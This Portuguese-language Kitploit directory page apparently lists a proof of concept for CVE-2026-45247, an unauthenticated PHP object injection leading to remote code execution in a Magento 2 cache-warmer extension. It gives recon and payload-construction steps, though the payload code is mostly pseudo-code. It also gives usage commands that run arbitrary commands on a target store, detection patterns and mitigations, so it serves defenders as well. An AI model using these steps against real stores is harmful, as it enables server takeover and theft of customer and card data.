Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
PoC-Funcional---CVE-2026-45247-Mirasvit-Full-Page-Cache-Warmer-RCE- — PoC funcional de CVE-2026-45247: Injeção de Objeto PHP para RCE não autenticado no Mirasvit Full Page Cache (Magento 2). | Kitploit
Ferramentas/GitHubGitHub/fevar54/poc-funcional---cve-2026-45247-mirasvit-full-page-cache-warmer-rce-
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubfevar54/poc-funcional---cve-2026-45247-mirasvit-full-page-cache-warmer-rce-

PoC-Funcional---CVE-2026-45247-Mirasvit-Full-Page-Cache-Warmer-RCE-

PoC funcional de CVE-2026-45247: Injeção de Objeto PHP para RCE não autenticado no Mirasvit Full Page Cache (Magento 2).

Ver Repositório
10há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-45247 - Mirasvit Full Page Cache Warmer for Magento 2 - Injeção de Objeto PHP → RCE

CVE-2026-45247 CVSS CISA KEV

📋 Descrição

CVE-2026-45247 é uma vulnerabilidade crítica de Injeção de Objetos PHP (PHP Object Injection) na extensão Mirasvit Full Page Cache Warmer para Magento 2 e Adobe Commerce. Um atacante não autenticado pode alcançar Execução Remota de Código (RCE) através do envio de um objeto PHP serializado manipulado no cookie CacheWarmer.

A vulnerabilidade reside na chamada sem restrições à função nativa unserialize() do PHP, combinada com cadeias de gadgets (gadget chains) disponíveis no Magento e suas dependências (especialmente Monolog).

AtributoValor
CVECVE-2026-45247
ProdutoMirasvit Full Page Cache Warmer for Magento 2
Versões afetadasTodas as versões anteriores a 1.11.12
Patch disponívelVersão 1.11.12 (25 de maio de 2026)
CVSS Score9.8 (Crítica)
VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Estado no CISA KEVExploração ativa confirmada (adicionada em 03/06/2026)
Data limite06/06/2026

🚨 Mecanismo de Ataque

  1. A extensão processa o cookie CacheWarmer em cada requisição da loja
  2. O valor do cookie é passado para unserialize() sem sanitização
  3. Um atacante envia um objeto PHP serializado malicioso
  4. Usando cadeias de gadgets (gadget chains) do Monolog (SyslogUdpHandler, BufferHandler, FingersCrossedHandler), consegue-se RCE
  5. O comando é executado no servidor com privilégios do serviço web

⚙️ Fases do Ataque

Fase 1: Reconhecimento

# Verificar se a loja usa Mirasvit Cache Warmer
curl -s https://loja.com/pub/media/mirasvit/cache_warmer/CHANGELOG.md

Fase 2: Análise de Vulnerabilidade

# La cookie se procesa en cada request sin autenticación
# El código vulnerable en Mirasvit:
$cookieValue = $_COOKIE['CacheWarmer'];
$data = unserialize(base64_decode($cookieValue));  # ¡Peligro!

Fase 3: Execução do Exploit

# Construcción de la cookie maliciosa
payload = serialize(PHPObjectInjection())
cookie_value = f"CacheWarmer:{base64_encode(payload)}"

# Envío de la petición
requests.get(target, cookies={'CacheWarmer': cookie_value})

🛠️ Uso do PoC

Instalação

git clone https://github.com/seu-usuario/CVE-2026-45247.git
cd CVE-2026-45247
pip install requests

Execução Básica

# Verificar vulnerabilidade
python3 cve_2026_45247_poc.py https://loja.exemplo.com --check-only

# Executar comando 'id'
python3 cve_2026_45247_poc.py https://loja.exemplo.com "id"

# Executar comando personalizado
python3 cve_2026_45247_poc.py https://loja.exemplo.com "whoami"

# Usar proxy para depuração
python3 cve_2026_45247_poc.py https://loja.exemplo.com "ls -la" --proxy http://127.0.0.1:8080

Script Rápido

# Verificar com script bash
chmod +x check_cve_2026_45247.sh
./check_cve_2026_45247.sh https://loja.exemplo.com

📊 Impacto Demonstrado

  • Execução remota de comandos (RCE) no servidor Magento
  • Acesso completo ao banco de dados de clientes e pedidos
  • Instalação de webshells para persistência
  • Comprometimento total da loja online
  • Potencial vazamento de dados de cartões de crédito
  • Movimento lateral na infraestrutura corporativa

🛡️ Detecção

Indicadores de Comprometimento (IOCs) Em logs de acesso:

CacheWarmer: (Tz|Qz|YT)[a-zA-Z0-9+/=]+

Comandos observados na exploração:

echo PWNED_CVE2026_$(date +%s)
sleep 5

Cadeias de gadgets utilizadas:

  • Monolog\Handler\SyslogUdpHandler
  • Monolog\Handler\BufferHandler
  • Monolog\Handler\FingersCrossedHandler
  • Monolog\Handler\GroupHandler

🔧 Mitigação

Atualização Imediata

# Atualizar para versão corrigida
composer require mirasvit/module-cache-warmer:1.11.12
bin/magento cache:flush

Mitigações Temporárias

# Bloquear cookie CacheWarmer no .htaccess ou nginx
RewriteCond %{HTTP_COOKIE} CacheWarmer
RewriteRule .* - [F,L]
// En app/code/local/Custom/BlockCookie.php
if (isset($_COOKIE['CacheWarmer'])) {
    unset($_COOKIE['CacheWarmer']);
}
Baixar ferramenta